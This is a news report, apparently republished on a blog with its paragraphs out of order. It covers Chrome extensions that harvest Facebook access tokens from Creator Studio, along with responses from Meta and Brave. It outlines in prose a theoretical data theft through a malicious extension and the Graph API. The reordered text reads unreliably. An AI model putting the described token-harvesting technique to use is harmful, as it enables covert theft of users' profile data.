![]() ![]() ![]() ![]() “The access tokens that these extensions request help creators and others to use our tools and products but aren’t capable of accessing data beyond what people can do with their own account or what the session cookie on their browser already provides," Meta's spokesperson said in an email. In an email to The Register, a Meta spokesperson said the company is dealing with these extensions but that requires the help of Google. "Under the new framework required by the FTC, we’ll be accountable and transparent about fixing old products that don’t work the way they should and building new products to a higher standard," Facebook insisted when it promised to clean up data access nearly three years ago. Though Facebook vowed to put in place measures to prevent another Cambridge Analytica fiasco, the Creators Studio access tokens in the hands of a malicious and widely installed Chrome extension could lead to a repeat of history. There are parallels here: you hope that a quiz app won't share your Facebook profile info with others, and you hope a Chrome extension avoids that, too. As part of that deal, Facebook committed to limiting third-party access to user data.Ĭambridge Analytica obtained people's Facebook profile information via a third-party quiz app that plugged into the social network. A Brave spokesperson said the company is working with the programmer to make some changes – likely a notification or permission prompt – so the extension is acceptable from a privacy and security standpoint.Īnd it's a risk that ought to concern Meta and its subsidiaries given Facebook's 2019 settlement of an FTC investigation that followed from the Cambridge Analytica scandal. extension, until developer Loc Mai contacted Brave's development team. It was this risk that prompted browser maker Brave to block the L.O.C. Nonetheless, the token does provide programmatic access to data about signed-in Facebook users without authorization or consent. extension has been exfiltrating information from people’s devices. ![]() And Meta said there's no indication that the L.O.C. The access token available through Creator Studio does not pose the same threat of account takeover as the "View As" token.Ī Meta spokesperson told us via email that these sorts of tokens have legitimate uses and provide no access to data beyond what's available to an individual account holder. "Access tokens are the equivalent of digital keys that keep people logged in to Facebook so they don’t need to re-enter their password every time they use the app." "This allowed them to steal Facebook access tokens which they could then use to take over people’s accounts," explained Guy Rosen, who was VP of Product Management at the time and is now VP of Integrity at Meta. In September 2018, Facebook acknowledged a security issue affecting almost 50 million accounts, which it attributed to miscreants stealing access tokens presented by its "View As" feature to allow people to see how their profiles look to others. The access token is obtained by fetching this page and extracting accessToken from the source. The ability to grab an access token from the Creator Studio provides a route for extensions to quietly, automatically harvest signed-in users' profile data without permission and without having to, say, scrape pages. The extension then exfiltrates the victim's data to a remote server.Whenever a victim installs your Chrome extension and is signed into Facebook, the extension obtains one of these tokens on the victim's behalf to silently access their Facebook data via the social network's Graph API.You create and release a seemingly innocent Chrome extension that can fetch access tokens from Facebook's Creator Studio.Here's how a theoretical data theft could occur: ![]()
0 Comments
Leave a Reply. |
Details
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |